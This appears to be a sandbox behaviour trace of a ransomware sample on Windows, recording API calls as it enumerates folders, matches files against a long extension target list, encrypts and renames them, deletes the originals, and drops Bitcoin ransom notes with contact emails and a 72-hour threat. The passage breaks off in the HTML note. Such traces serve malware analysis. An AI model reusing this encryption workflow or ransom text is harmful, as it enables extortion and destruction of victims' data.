	[0172.459] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0172.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.459] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0172.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0172.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0172.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0172.460] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="..", cAlternateFileName="")) returned 1
	[0172.461] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0172.461] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa13e3f24, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa13e3f24, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0172.461] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0172.461] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0172.461] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\"
	[0172.461] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml"
	[0172.461] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml") returned 97
	[0172.461] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.462] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml") returned 0x61
	[0172.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.463] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.463] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml"
	[0172.463] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml") returned 97
	[0172.463] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.464] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.464] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0172.464] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.464] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0172.464] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.465] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.465] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.466] ReadFile (in: hFile=0x39c, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x139, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x189930*=0x139, lpOverlapped=0x0) returned 1
	[0172.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.469] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb440) returned 1
	[0172.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.472] CryptCreateHash (in: hProv=0xfcb440, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0172.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.472] CryptHashData (hHash=0xfb9070, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0172.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.472] CryptDeriveKey (in: hProv=0xfcb440, Algid=0x6610, hBaseData=0xfb9070, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb9670) returned 1
	[0172.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.473] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x139, dwBufLen=0x139 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x140) returned 1
	[0172.473] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.473] RtlMoveMemory (in: Destination=0xfdc770, Source=0xfdcd58, Length=0x139 | out: Destination=0xfdc770) 
	[0172.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.474] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x139, dwBufLen=0x140 | out: pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x140) returned 1
	[0172.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.475] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0172.475] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.475] CryptDestroyHash (hHash=0xfb9070) returned 1
	[0172.475] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.475] CryptReleaseContext (hProv=0xfcb440, dwFlags=0x0) returned 1
	[0172.475] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.476] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.476] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.477] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0172.478] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0172.479] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0172.479] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc770*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc770*, lpNumberOfBytesWritten=0x189938*=0x140, lpOverlapped=0x0) returned 1
	[0172.482] CloseHandle (hObject=0x3a0) returned 1
	[0172.484] CloseHandle (hObject=0x39c) returned 1
	[0172.484] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml")) returned 1
	[0172.487] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml")) returned 0
	[0172.487] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa13e3f24, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa13e3f24, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0172.487] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0172.487] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0172.488] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov"
	[0172.488] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*.*"
	[0172.488] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.489] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.489] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0172.489] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.489] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0172.490] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0172.492] CloseHandle (hObject=0x390) returned 1
	[0172.493] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.494] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0172.495] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0172.496] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.496] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0172.496] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0172.496] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0172.497] CloseHandle (hObject=0x390) returned 1
	[0172.497] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.497] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.498] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0172.498] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0172.498] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.503] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the 